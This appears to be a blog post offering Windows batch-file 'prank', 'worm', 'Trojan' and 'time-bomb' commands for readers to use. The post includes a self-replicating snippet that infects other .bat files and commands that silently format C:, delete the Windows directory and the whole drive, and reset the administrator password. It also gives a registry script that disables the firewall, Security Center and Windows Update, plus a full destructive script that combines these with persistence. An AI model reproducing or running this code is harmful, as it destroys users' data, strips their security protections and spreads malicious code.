DOS batch files have the filename extension .bat. Batch files for other environments may have different extensions, e.g. .cmd or .bat in the Microsoft Windows NT-family of operating systems and OS/2, or .btm in 4DOS and 4NT related shells. The Windows 9x family of operating systems only recognize the .bat extension
Example Commands
Swap mouse buttons:
rundll32 user,swapmousebutton
Open the URL you want:
start http://www.google.com
Shut down the computer and show any message you want:
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse till next restart:
rundll32 mouse,disable
Disable keyboard till next restart:
rundll32 keyboard,disable
Freezes computer till restart:
rundll32 user,disableoemlayer
=======================================================================
Worm commands:
That command (two lines) will copy itself to any batch file in the directory.
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
Clears other batch file's source and copies itself to it.
%0 >>other.bat
=======================================================================
Trojan Codes:
Sends list of files in same directory into a text document, and places it into a text document in the same directory.
dir *.*>>Filelist.txt
Changes specific user account's password to whatever you want.
net user administrator PASSWORD HERE
Creates a text file with ip address information in same directory as batch file.
ipconfig >Computer-IP-address.txt
Copies itself to the AutoRun section of windows.
COPY %0 %windir%WINSTART.BAT
Formats c drive without asking.
format c: /q /autotest
Deletes windows
DELTREE /Y %windir%
Deletes C: Drive, /F means forced, /S deletes whole tree, /Q makes it quiet so it does not ask permittion.
DEL /F /S /Q C:
This is a potential Time-Bomb virus and remember to change the date!
Quote:@echo off
echo. | date | find /c /i "2005.05.10" > NUL
If errorlevel 1 GoTo End
YOUR 'VIRUS' CODE HERE.
:End
The following will turn off the firewall and stop the security center.
Quote:net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS
haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw
uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
This code is also a Time-Bomb
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo You got owned!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.fbi.gov
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices
SharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
Serviceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Services
wscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Your computer is destroyed" -f
0 comments:
Post a Comment